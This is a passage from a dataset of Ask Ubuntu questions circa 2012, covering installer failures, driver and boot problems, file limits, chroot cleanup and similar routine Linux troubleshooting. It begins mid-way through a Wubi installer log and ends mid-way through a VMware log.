07-10 23:33 debug distro : checking whether e : \ is a valid kubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid kubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid xubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid xubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid edubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid edubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid lubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid lubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid ubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid ubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid kubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid kubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid xubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid xubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid edubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid edubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid lubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether u : \ is a valid lubuntu cd 07-10 23:33 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:33 info root : running the installer ... 07-10 23:33 debug windowsfrontend : __init__ ... 07-10 23:33 debug windowsfrontend : on_init ... 07-10 23:33 info winuipage : appname=wubi , localedir=c : \users\joseph\appdata\local\temp\pyla05e.tmp\translations , languages= [ 'en_us ' , 'en ' ] 07-10 23:33 info winuipage : appname=wubi , localedir=c : \users\joseph\appdata\local\temp\pyla05e.tmp\translations , languages= [ 'en_us ' , 'en ' ] 07-10 23:35 debug winuiinstallationpage : target_drive=u : , installation_size=30000mb , distro_name=ubuntu , language=en_us , locale=en_us.utf-8 , username=joseph 07-10 23:35 info root : received settings 07-10 23:35 debug commonbackend : searching for local cd 07-10 23:35 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid ubuntu cd 07-10 23:35 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:35 debug distro : checking whether d : \ is a valid ubuntu cd 07-10 23:35 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:35 debug distro : checking whether e : \ is a valid ubuntu cd 07-10 23:35 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:35 debug distro : checking whether u : \ is a valid ubuntu cd 07-10 23:35 debug distro : does not contain u : \casper\filesystem.squashfs 07-10 23:35 debug commonbackend : searching for local iso 07-10 23:35 info winuipage : appname=wubi , localedir=c : \users\joseph\appdata\local\temp\pyla05e.tmp\translations , languages= [ 'en_us ' , 'en ' ] 07-10 23:35 debug tasklist : # running tasklist ... 07-10 23:35 debug tasklist : # # running select_target_dir ... 07-10 23:35 info windowsbackend : installing into u : \ubuntu 07-10 23:35 debug tasklist : # # finished select_target_dir 07-10 23:35 debug tasklist : # # running create_dir_structure ... 07-10 23:35 debug commonbackend : creating dir u : \ubuntu 07-10 23:35 debug commonbackend : creating dir u : \ubuntu\disks 07-10 23:35 debug commonbackend : creating dir u : \ubuntu\install 07-10 23:35 debug commonbackend : creating dir u : \ubuntu\install\boot 07-10 23:35 debug commonbackend : creating dir u : \ubuntu\disks\boot 07-10 23:35 debug commonbackend : creating dir u : \ubuntu\disks\boot\grub 07-10 23:35 debug commonbackend : creating dir u : \ubuntu\install\boot\grub 07-10 23:35 debug tasklist : # # finished create_dir_structure 07-10 23:35 debug tasklist : # # running create_uninstaller ... 07-10 23:35 debug windowsbackend : copying uninstaller c : \users\joseph\downloads\wubi.exe - > u : \ubuntu\uninstall-wubi.exe 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi uninstallstring u : \ubuntu\uninstall-wubi.exe 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi installationdir u : \ubuntu 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayname ubuntu 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayicon u : \ubuntu\ubuntu.ico 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayversion 12.04-rev266 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi publisher ubuntu 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi urlinfoabout http : //www.ubuntu.com 07-10 23:35 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi helplink http : //www.ubuntu.com/support 07-10 23:35 debug tasklist : # # finished create_uninstaller 07-10 23:35 debug tasklist : # # running create_preseed_diskimage ... 07-10 23:35 debug tasklist : # # finished create_preseed_diskimage 07-10 23:35 debug tasklist : # # running get_diskimage ... 07-10 23:35 debug tasklist : new task download 07-10 23:35 debug tasklist : # # # running download ... 07-10 23:35 debug downloader : downloading http : //releases.ubuntu.com/12.04/ubuntu-12.04-wubi-amd64.tar.xz > u : \ubuntu\disks\ubuntu-12.04-wubi-amd64.tar.xz 07-10 23:35 debug downloader : download start filename=u : \ubuntu\disks\ubuntu-12.04-wubi-amd64.tar.xz , url=http : //releases.ubuntu.com/12.04/ubuntu-12.04-wubi-amd64.tar.xz , basename=ubuntu-12.04-wubi-amd64.tar.xz , length=512730488 , text=none 07-11 00:00 debug tasklist : # # # finished download 07-11 00:00 debug downloader : download finished ( read 512730488 bytes ) 07-11 00:00 debug tasklist : # # finished get_diskimage 07-11 00:00 debug tasklist : # # running extract_diskimage ... 07-11 00:03 debug tasklist : # # finished extract_diskimage 07-11 00:03 debug tasklist : # # running choose_disk_sizes ... 07-11 00:03 debug windowsbackend : total size=30000 root=29744 swap=256 home=0 usr=0 07-11 00:03 debug tasklist : # # finished choose_disk_sizes 07-11 00:03 debug tasklist : # # running expand_diskimage ... 07-11 00:05 debug tasklist : # # finished expand_diskimage 07-11 00:05 debug tasklist : # # running create_swap_diskimage ... 07-11 00:05 debug tasklist : # # finished create_swap_diskimage 07-11 00:05 debug tasklist : # # running modify_bootloader ... 07-11 00:05 debug tasklist : new task modify_bcd 07-11 00:05 debug tasklist : # # # running modify_bcd ... 07-11 00:05 debug windowsbackend : modify_bcd drive ( c : hd 78696.8203125 mb free ntfs ) 07-11 00:05 error tasklist : error executing command > > command=c : \windows\sysnative\bcdedit.exe /set { 970e3d1b-e019-11df-a016-81045c79c1f9 } device partition=u : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=c : \windows\sysnative\bcdedit.exe /set { 970e3d1b-e019-11df-a016-81045c79c1f9 } device partition=u : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= 07-11 00:05 debug tasklist : # cancelling tasklist 07-11 00:05 debug tasklist : new task modify_bcd 07-11 00:05 error root : error executing command > > command=c : \windows\sysnative\bcdedit.exe /set { 970e3d1b-e019-11df-a016-81045c79c1f9 } device partition=u : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=c : \windows\sysnative\bcdedit.exe /set { 970e3d1b-e019-11df-a016-81045c79c1f9 } device partition=u : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= 07-11 00:05 debug tasklist : new task modify_bcd 07-11 00:05 debug tasklist : # # finished modify_bootloader 07-11 00:05 debug tasklist : # finished tasklist what have i done wrong ? what can i do ? if i turn off my laptop , will i actually be able to turn it back on ? if you want me to post the log from the first day it happened , i 'd be glad to in the comments , in the main body it made it over 30000 characters .
162284	configuring dropbox on ubuntu server	i 've got a ubuntu server running on an old laptop . the os is on a 4gb usb drive and i use a sata drive attached for storage . now i wanted to set up dropbox on this machine . i 've got it running using this guide : http : //www.byteindia.com/internet/install-dropbox-on-linux/482/ . but i have n't synched yet because there wo n't be enough room in my home dir . my /home is on my 4gb usb since i never use it and all my data is on the 2tb drive mounted in /media/ . what is the best way to set this up ? dropbox does n't support moving the folder in linux yet . i found a script to move the folder but it seems outdated . perhaps i can use symlinks in some clever way ? or maybe move my /home folder to my sata drive ? thanks in advance
162287	how to install asterisk on ubuntu 11.10 ?	i want to install asterisk server on ubuntu 11.10 . is there a tutorial ?
162296	how do i stop update manager trying to downgrade my 3.4 kernel to 3.2 ?	i installed the 3.4 kernel for hardware support reasons , and everything is working swimmingly.. but updatemanager keeps prompting me to install the 3.2 kernel again . is there a way to stop it doing that ?
162299	can not activate num pad at all	i have two accounts on the same machine . num pad on one account it working normally e.g . i can turn it on/off via numlock button . the num pad on the other account on this machine stopped working . i can not turn it on and the buttons work as the numlock is turned off . this happened without me touching any setting or all . it just happened and now i can not turn them on no matter what i try . i tried via console command numlockx on - did not help . tried via ui setting - did not help either . updated the system from 11.10 to 12.04 , did not help either . i really do not know what to do except i make a clean reinstallation of the system which would take 2 days away from me . it 's obviously the problem in this account only , as num pad works in the other account . anyone with a good suggestion ?
162302	how to install ubuntu on imac	i need help ! im still new to this . i really need help , i have an imac.. ( it 's corrupted . when i try to open it , it shows a question mark alternating with a smiley ) model family : imac g5 processor : 1.8ghz g5 ( powerpc 970fx ) manufacturer : motorola of cpus : 1 size : 17 '' finish : matte resolution : 1440x900 backlight : ccfl base memory : 256mb pc3200 dimm max memory : 2gb memory slots : 2 brand : apple original os : mac os x 10.3.5 i think it 's vintage . haha . but i want to fix it . first , i think the hard drive is broken ( pretty much corrupted ) but i tried to install a xubuntu os on it because i do n't have any other disc . but i think xubuntu is not compatible because i ca n't seem to get pass through the partitioning part . could some one please help..
162304	i am getting disconnected from dsl modem and ca n't connect unless i restart .	i am using ubuntu very recently . my dsl connection with the modem is working fine but after certain idle time the modem connection is getting disconnected and i am not getting the icons to reconnect . if i go to system settings -- > network , it is showing `` network cable is unplugged '' . it works fine if i reboot . this is a sudden problem and no configuration has been altered . i am using ubuntu 12.04 with latest updates .
162308	covert rmvb file to play on my media player ( wd tv )	i have downloaded a seinfeld series and it is in the rmvb format . when i copy to my external and try to play on the wd tv it does not recognise it . i think i need to convert it to another format ?
162310	how can i create an iso from a currently running ubuntu server ?	we have ubuntu 10.04 lts running on one of our servers . is it possible to create a bootable and installable iso with its exact configuration ? i would then use the created iso to install ubuntu server on another machine so that i do not have to make any modifications . is there any software like remastersys for ubuntu server , or will remastersys work for lvm partitions ?
162317	screen brightness not working	i use ubuntu 12.04 on my sony vaio ( vpccw2hgx ) . at the first times , brightness control works well , but after the activating additional drivers ( nvidia accelerated graphics driver ) brightness control does n't work . i searched this issue on so many ubuntu and linux forums , but solutions does n't work . i tried these ways : installing xbacklight , adding option `` registrydwords '' `` enablebrightnesscontrol=1 '' to /etc/x11/xorg.conf updating nvidia drivers to try to change brightness by typing `` sudo setpci -s 00:02.0 f4.b=xx '' all of these ways does n't work . i still ca n't set screen brightness . is there anyone know this ? thanks .
162319	how do i stop all processes in a chroot ?	i have a number of lvm partitions , each containing an ubuntu installation . occasionally , i want to do an apt-get dist-upgrade , to update an installation to the most recent packages . i do this with chroot - the process is usually something like : $ sudo mount /dev/local/chroot-0 /mnt/chroot-0 $ sudo chroot /mnt/chroot-0 sh -c 'apt-get update & & apt-get dist-upgrade' $ sudo umount /mnt/chroot-0 [ not shown : i also mount and unmount /mnt/chroot-0/ { dev , sys , proc } as bind-mounts to the real /dev , /sys and /proc , as the dist-upgrade seems to expect these to be present ] however , after upgrading to precise , this process no longer works - the final umount will fail because there are still open files on the /mnt/chroot-0 filesystem . lsof confirms that there are processes with open files in the chroot . these processes have been started during the dist-upgrade , i 'm assuming this is because certain services in the chroot need to be restarted ( eg , through service postgresql restart ) after the package is upgraded . so , i figure i need to tell upstart to stop all the services that are running within this chroot . is there a way to reliably do this ? i 've tried : cat < < eof | sudo chroot /mnt/chroot-0 /bin/sh # stop 'initctl ' services initctl list | awk '/start\/running/ { print \ $ 1 } ' | xargs -n1 -r initctl stop eof where initctl list seems to do the right thing and only list processes that have been started in this particular root . i 've tried adding this too , as suggested by tuminoid : cat < < eof | sudo chroot /mnt/chroot-0 /bin/sh # stop 'service ' services service -- status-all 2 > /dev/null | awk '/^ \ [ \+ \ ] / { print \ $ 4 } ' | while read s ; do service \ $ s stop ; done eof however , these does n't seem to catch everything ; processes that have daemonised and been reparented to pid 1 do n't get stopped . i 've also tried : sudo chroot /mnt/chroot-0 telinit 0 but in this case , init does n't distinguish between the separate roots and shuts down the entire machine . so , is there any way to tell init to stop all processes in a particular chroot , so that i can safely unmount the filesystem ? does upstart have any facility to sigterm/sigkill all child processes ( as would be done during regular shutdown ) within a chroot ?
162323	lubuntu notify-send remove limit of 21 ?	sending notifications with notify-send in lubuntu notify-send -i error -t 1000 `` error '' `` error notification '' i can send only 21 of them , after that no more notifications sent , the only way to receive more notifications is to click on the panel where there 's a letter with the number 21 and then click on the button `` clear all notifications '' . is there a way to avoid the need to go clicking the button , also is there a way to remove at all that letter with number of notifications received ? update : i realize that notification-daemon ( 0.7.3 ) is used . i downloaded the sources and edited the source code ( nd-queue.c - on_bubble_destroyed ) to do not buffer but always destroy the bubbles but i would prefer another way ...
162324	can i restore with déjà dup after formatting my computer ?	as mountain lion is coming this month , i would like to do a clean installation of my dual-boot imac , but as i use more ubuntu , i want to give it more hd space than it haves now ( 125 gb in a 500 gb hdd , the rest of the hd is used by mac os ) . i have some backups done with déjà dup in an external hd , and i saw that they 're done using gpg . is then possible to restore my backup after formatting the hard disk ?
162328	why does gnome/kde require /usr/bin/x to run ?	is there any good resource about these low level graphic configuration ? it is all fuzzy to me .
162332	high temperatures dual amd gpu llano	i got a problem . i tried a lot of distributions ( ubuntu , lubuntu , xubuntu , kubuntu too ) and i 've the same problem on everyone of them : i always have high temperatures caused ( i think ) by dual gpu system . here 's my config : cpu : amd llano 3510mx gpu1 ( internal ) : amd 6620g 512mb gpu2 ( external ) : amd 66470 1gb ddr3 ram : 4gb 1333mhz ddr3 i tried both fglrx and radeon open source drivers with the following results : radeon results : 90° idle - shutdown after 10 mins caused by high temperatures . fglrx results : 60-70° idle - 75 - 80° with gnome 3 animations . if i try to watch a video the system shutdown . on windows i 've 65° with max performance , youtube video and eclipse running . and 45° on idle . so , how can i solve this problem ? ps : i ca n't shutdown internal gpu from bios ... i 've to recompile kernel in any way ? sorry for my bad english .
162334	x fails to load	today i tried to boot ubuntu with 9wm ( which i had installed before ) , first modifying the grub boot from 'quiet splash ' to 'text ' , after adding it to lightdm . as it does n't worked , i 've removed the lightdm entry and restored grub . but when i try to login with any window manager in lightdm , it just stops and opens lightdm again . if i try to run startx from a tty , it shows erros , saying all time that no protocol specified . what can i do ? update : it just happends with my user , logging with another one works .
162344	how to make full domain controller with active directory ?	how to make full domain controller with active directory that can accept windows client pc 's using ubuntu lts 12.04 desktop edition . i need a full tutorial that show me step by step how could it be made since i got confused from those on internet since many guides that conflict each other.thanks in advance
162345	how to increase open file limits ( nofile and epoll ) in 10.04 ?	i 'm running into a fairly common problem in configuring a hadoop cluster ( actually , its using cloudera 's pseudo distributed cluster on a single machine ) , where the number of files that hadoop is opening is exceeding the file system limits . cloudera recommends adding the following lines to /etc/security/limits.conf : hdfs hard nofile 16384 # hdfs is my 'hadoop ' user equivalent and , since i 'm running kernel 2.6.32 , also editing /etc/sysctl.conf : fs.epoll.max_user_instances = 4096 after making these changes and restarting my server , i am still getting the same error ! it still appears that hdfs 's open file limits have not been increased beyond the 1024 default : [ bash ] $ sudo lsof | awk ' { print $ 3 } ' | sort | uniq -c | sort -nr 2145 root 1495 hdfs 610 mapred 359 www-data 305 rdm 116 mysql 83 rabbitmq 32 messagebus 30 snmp 25 ntp 23 syslog 16 daemon 1 user as i 've done more research its becoming clear that increasing the file size limits is highly system dependent ( even within ubuntu ; here , here , and here ) , so i wanted to see what the ubuntu method is . does anyone know how to increase these limits in ubuntu 10.04 ? i definitely prefer solutions that do not increase the limits for all users , but at this point i would be willing to try anything . thanks for your help !
162346	unsolved mystery : `` mountall : disconnected from plymouth ''	when i boot , it goes straight into tty1 . i have tried everything i could find online to solve this problem . i believe it has something to do with the nvidia drivers . but reinstalling them in every possible way makes no difference . i am at a complete loss . my question is very similar to this question which never got answered : mountall : disconnected from plymouth the boot ends with this : mountall : plymouth command failed mountall : disconnected from plymouth in syslog : nvrm : your system is not currently configured to drive a vga console nvrm : on the primary vga device . the nvidia linux grphics driver nvrm : requires the use of a text-mode vga console . use of other console nvrm : drivers including , but not limited to , vesafb , may result in nvrm : corruption and stability problems , and is not supported . in xorg.0.log : ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 ( ee ) nvidia ( 0 ) : screen ( s ) found , but none have a usable configuration . fatal server error : no screens found server terminated with error ( 1 ) . closing log file . i 'm running 12.04 precise on a 64-bit amd . i have an nvidia gt 630 video card .
162348	how do i upload an updated package to my ppa without having quickly mess it up ?	as part of ubuntu app showdown i received comments on deb packaging ( as maybe all other participants ) . those can be easy fixed and i spotted them before , but debian packaging files are managed by quickly . so the question is : how to build and upload to the ppa updated package , without being mangled by quickly ? quickly also increments version on release and rebuilds .pot translation strings file . how can we achieve this without quickly ?
162362	how does one undelete or repair btrfs partitions ?	had a powerâcut last week and thought nothing of it but today when i opened ( mounted ) a data partition for archiving edited video files , i noticed it had 50gb free when it previously had only 2âś john @ joran ~ > df -h /media/editing/ filesystem size used avail use % mounted on /dev/sda10 232g 181g 49g 79 % /media/editing john @ joran ~ > sudo btrfs fi show /dev/sda10 label : 'editing ' uuid : *snip* total devices 1 fs bytes used 180.01gb devid 1 size 231.27gb used 229.54gb path /dev/sda10 john @ joran ~ > sudo fsck.btrfs -- repair /dev/sda10 found 193283719168 bytes used err is 0 total csum bytes : 188503800 total tree bytes : 255827968 total fs tree bytes : 1744896 btree space waste bytes : 49940305 file data blocks allocated : 1728409796608 referenced 192990859264 btrfs btrfs v0.19 john @ joran ~ > uname -a *snip* 3.2.0-25-generic # 40-ubuntu smp wed may 23 20:30:51 utc 2012 x86_64 gnu/linux any advice ?
162368	how to access apache log file via php ( not parsing log file )	is there a way that i can access apache log files from my php page . normally the apache will not allow access to outer folders . is there any alternative way to access log files ? if i get those logs i can parse them and find out bandwidth usages edit : i actually want to implement a bandwidth tracking system which can track how much data , a user is downloaded form my site . or uploaded to my site . i searched in stackoverflow and found an answer which suggests parsing log file . i need to automate this so that website itself will parse the log and show the details.any idea ?
162371	what is the named daemon and why is it running ?	i want to know why the named daemon is running , do i need it running for my vps to work properly ? can i stop or remove it ?
162378	what is the advantage of using symbolic link ?	i 'm a new user to ubuntu . and i do install some software . i see many tutorials uses symbolic link to a directory . like this : ln -s are there any advantages of using this way ? or it is the way it should be done ?
162383	logon screen wont accept details , but terminal does ?	my ubuntu machine has suddenly started asking for a username and password when it starts up but does not accept the details i enter . when i go into terminal however , it seems to work fine . i have tried using the passwd < user > change thing but get authentication error . i know i am definately entering the correct details as i always use the same ones . how can i change the password ?
162384	is there any midnight commander alternative that allows me to see the folder size ?	i want any alternative for ubuntu 11.04 that runs on the command window that allows me to see which folder use up a lot of space . p.s . it 's for my vps .
162386	can i take the expo animation from cinnamon and use it in unity ?	in cinnamon , when you put the cursor into the top-left corner , it invokes expo and there 's a lovely little animated effect ( sort of a blue ripple ) . is there any way i can take this effect and apply it to unity ? i 've already used compiz-config settings manager to set the bottom right corner to invoke expo , but is there an application or something similar that i can use to replicate that lovely ripple ?
162390	run as group fails ( sudo -g )	i would like to run a command with temporary group membership but it seems that i do n't have permission to do that . as an example , if i run sudo -g internet ls , i get the message sorry , user rudivonstaden is not allowed to execute '/bin/ls ' as rudivonstaden : internet on rudivonstaden-desktop . in my limited understanding , this should be governed by the /etc/sudoers file , potentially modified by files in /etc/sudoers.d . the latter folder only contains the readme file , and the sudoers file has the following : root all= ( all : all ) all % sudo all= ( all : all ) all as far as i can tell , that should allow any sudo user to run any file as any group using the -g option . is there a bug somewhere , or am i missing something ?
162391	how do i fix my locale issue ?	i am getting this message everytime i do something like starting or stopping a service . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lc_messages = `` en_us.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... 21173 files and directories currently installed . ) removing bind9 ... * stopping domain name service ... bind9 [ ok ] processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory how do i fix this error ?
162392	digikam : what 's the problem ?	i installed digikam by using the philip5-ppa . when i run it i get the error below . this is by running it through gdb : starting program : /usr/bin/digikam /usr/bin/digikam : error while loading shared libraries : libcxcore.so.2.1 : can not open shared object file : no such file or directory [ inferior 1 ( process 29894 ) exited with code 0177 ] what should i do to find the error and fix it ? i can see that somehow libcxcore.so.2.1 is wanted but not found . is this an error of the ppa , or can i simply point it in the right direction ? can i raise an issue with the ppa creator through launchpad ? some next steps would be quite helpful .
162399	notebook just died when battery was empty	i have kubuntu 12.04 installed on my thinkpad x220 . today , i just tried to see what happens when the battery runs low . it went steadily down to 0 % and then just died . this is what i have set up : is that normal that it just dies and does not shutdown ? edit : the 3 % mark was reached some 15 minutes before the computer died . there should have been plenty time .
162406	vmware player 4.04 on ubuntu 12.04 will not compile	i installed vmware-player-4.0.4-744019.i386.bundle onto ubuntu 11.10 . this worked fine . i then upgraded to ubuntu 12.04 the upgrade appeared to be successful . i then tried to start vmware player and i got a popup '' vmware kernel module updater '' i accept the process ( click install ) the updater process runs , the output of which is : stopping vmware services [ green tick ] virtual machine monitor [ red exclamation mark ] virtual network device [ green tick ] vmware blocking filesystem [ green tick ] virtual machine communication interface [ green tick ] vmci sockets an error dialog box pops up , with a red exclamation mark and the text : unable to start services see log file /tmp/vmware-root/modconfig-11912.log looking in the log file , it seems that these are the complaints : 2012-07-11t15:35:19.829z| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-07-11t15:35:19.829z| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h 2012-07-11t15:35:49.683z| vthread-3| i120 : failed to compile module vmnet ! i tried the patch for 4.0.3 and it did not work . can anyone point me in the right direction here ? this is the full log file : 2012-07-11t15:35:18.618z| vthread-3| i120 : log for vmware workstation pid=11912 version=8.0.4 build=build-744019 option=release 2012-07-11t15:35:18.618z| vthread-3| i120 : the process is 32-bit . 2012-07-11t15:35:18.618z| vthread-3| i120 : host codepage=utf-8 encoding=utf-8 2012-07-11t15:35:18.618z| vthread-3| i120 : host is linux 3.2.0-26-generic ubuntu 12.04 lts 2012-07-11t15:35:18.616z| vthread-3| i120 : msg_reset : 2012-07-11t15:35:18.616z| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /usr/lib/vmware/settings '' : no such file or directory . 2012-07-11t15:35:18.616z| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-07-11t15:35:18.616z| vthread-3| i120 : pref optional preferences file not found at /usr/lib/vmware/settings . using default values . 2012-07-11t15:35:18.617z| vthread-3| i120 : msg_reset : 2012-07-11t15:35:18.617z| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/config '' : no such file or directory . 2012-07-11t15:35:18.617z| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-07-11t15:35:18.617z| vthread-3| i120 : pref optional preferences file not found at /root/.vmware/config . using default values . 2012-07-11t15:35:18.617z| vthread-3| i120 : msg_reset : 2012-07-11t15:35:18.617z| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/preferences '' : no such file or directory . 2012-07-11t15:35:18.617z| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-07-11t15:35:18.617z| vthread-3| i120 : pref failed to load user preferences . 2012-07-11t15:35:18.618z| vthread-3| w110 : logging to /tmp/vmware-root/modconfig-11912.log 2012-07-11t15:35:19.054z| vthread-3| i120 : modconf query interface initialized 2012-07-11t15:35:19.056z| vthread-3| i120 : modconf library initialized 2012-07-11t15:35:19.158z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.168z| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:19.168z| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-07-11t15:35:19.168z| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-07-11t15:35:19.168z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:19.175z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.201z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.291z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:35:19.292z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:19.296z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.326z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.417z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:35:19.480z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.489z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.498z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.507z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.517z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.566z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.575z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.584z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.593z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.602z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.606z| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:19.606z| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-07-11t15:35:19.606z| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-07-11t15:35:19.606z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:19.611z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.635z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.741z| vthread-3| i120 : header path 